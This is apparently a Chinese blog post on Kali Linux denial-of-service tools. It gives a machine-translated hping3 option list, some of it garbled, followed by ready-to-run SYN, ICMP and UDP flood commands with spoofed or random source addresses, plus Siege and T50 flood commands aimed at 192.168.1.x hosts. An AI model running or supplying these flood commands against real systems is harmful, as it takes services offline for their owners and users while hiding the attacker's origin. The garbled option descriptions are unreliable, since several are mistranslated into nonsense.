kali linux之拒绝服务攻击工具
hping3
几乎可以定制发送任何TCP/IP数据包,用于测试FW,端口扫描,性能测试
-c - 计数包计数
-i - interval wait(uX表示X微秒,例如-i u1000)
- -i u10000的快速别名(第二个10个数据包)
- -i u1000的快速别名(第二个100个数据包)
--flood尽可能快地发送数据包。不要显示回复。
-n - 数字数字输出
-q - 安静
-I - 接口接口名称(否则为默认路由接口)
-V - verbose verbose模式
-D - 调试调试信息
-z - 绑定ctrl + z到ttl(默认为dst端口)
-Z - unbind unbind ctrl + z - 为收到的每个匹配数据包发出蜂鸣声
模式
默认模式TCP
-0 - RAIP RAW IP模式
-1 - icmp ICMP模式
-2 - 表示UDP模式
-8 - 扫描SCAN模式。示例:hping --scan 1-30,70-90 -S www.target.host
-9 - 听听模式
IP
-a - 欺骗欺骗源地址
--rand-dest随机destionation地址模式。看到那个男人。
--rand-source随机源地址模式。看到那个男人。
-t --ttl ttl(默认64)
-N - id id(默认随机)
-W --winid使用win * id字节排序
-r --rel相对化id字段(估计主机流量)
-f --frag分割更多碎片的数据包。 (可以通过弱acl)
-x --morefrag设置更多片段标志
-y --dontfrag set不分片标志
-g --fragoff设置片段偏移量
-m --mtu设置虚拟mtu,暗示--frag如果数据包大小> mtu
-o --tos服务类型(默认为0x00),尝试--tos帮助
-G --rroute包含RECORD_ROUTE选项并显示路由缓冲区
--lsrr松散的源路由和记录路由
--ssrr严格的源路由和记录路由
-H --ipproto仅在RAW IP模式下设置IP协议字段
ICMP
-C --icmptype icmp type(默认回显请求)
-K - icmpcode icmp code(默认为0)
--force-icmp发送所有icmp类型(默认发送仅支持的类型)
--icmp-gw设置ICMP重定向的网关地址(默认为0.0.0.0)
--icmp-ts别名为--icmp --icmptype 13(ICMP时间戳)
--icmp-addr别名为--icmp --icmptype 17(ICMP地址子网掩码)
--icmp-help显示其他icmp选项的帮助
UDP / TCP
-s --baseport基本源端口(默认随机)
-P --destport [+] [+] <port>目标端口(默认为0)ctrl + z inc / dec
-k - 保持静止源端口
-w --win winsize(默认64)
-O --tcpoff设置假tcp数据偏移量(而不是tcphdrlen / 4)
-Q --seqnum仅显示tcp序列号
-b --badcksum(尝试)发送具有错误IP校验和的数据包
许多系统将修复发送数据包的IP校验和
所以你会得到错误的UDP / TCP校验和。
-M --setseq设置TCP序列号
-L --setack设置TCP确认
-F --fin设置FIN标志
-S --syn设置SYN标志
-R - 首先设置RST标志
-P --push设置PUSH标志
-A --ack设置ACK标志
-U - 设置URG标志
-X --xmas设置X未使用标志(0x40)
-Y --ymas设置Y未使用标志(0x80)
--tcpexitcode使用最后的tcp-> th_flags作为退出代码
--tcp-mss启用具有给定值的TCP MSS选项
--tcp-timestamp启用TCP时间戳选项以猜测HZ /正常运行时间
同项
-d - 数据数据大小(默认为0)
-E - 文件中的文件数据
-e --sign添加'签名'
-j --dump以十六进制转储数据包
-J --print转储可打印字符
-B --safe启用“安全”协议
-u --end告诉你--file何时达到EOF并防止倒带
-T --traceroute traceroute mode(暗示--bind和--ttl 1)
--tr-stop在traceroute模式下收到第一个非ICMP时退出
--tr-keep-ttl保持源TTL固定,仅用于监视一跳
--tr-no-rtt不要在traceroute模式下计算/显示RTT信息,ARS包描述(新的,不稳定的)
--apd-send发送APD描述的数据包
syn flood攻击
hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.1.12
hping3 -S -P -U -p 80 --flood --rand-source 192.168.1.12
hping3 -SARFUP -p 80 --flood --rand-source 192.168.1.12
icmp flood攻击
hping3 -q -n -a 192.168.1.12 --icmp -d 56 --flood 192.168.1.10
udp flood攻击
hping3 -a 192.168.1.12 --udp -s 53 -d 100 -p 53 --flood 192.168.1.10
Siege:http/https压力测试工具,模拟多个用户并发访问请求
siege -g http://192.168.1.12/xxsec.php / 192.168.1.12
T50
t50 192.168.1.12 --flood --turbo -S --protocol TCP --dport 80
t50 192.168.1.12 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22
友情链接 http://www.cnblogs.com/klionsec
http://www.cnblogs.com/l0cm
http://www.cnblogs.com/Anonyaptxxx
http://www.feiyusafe.cn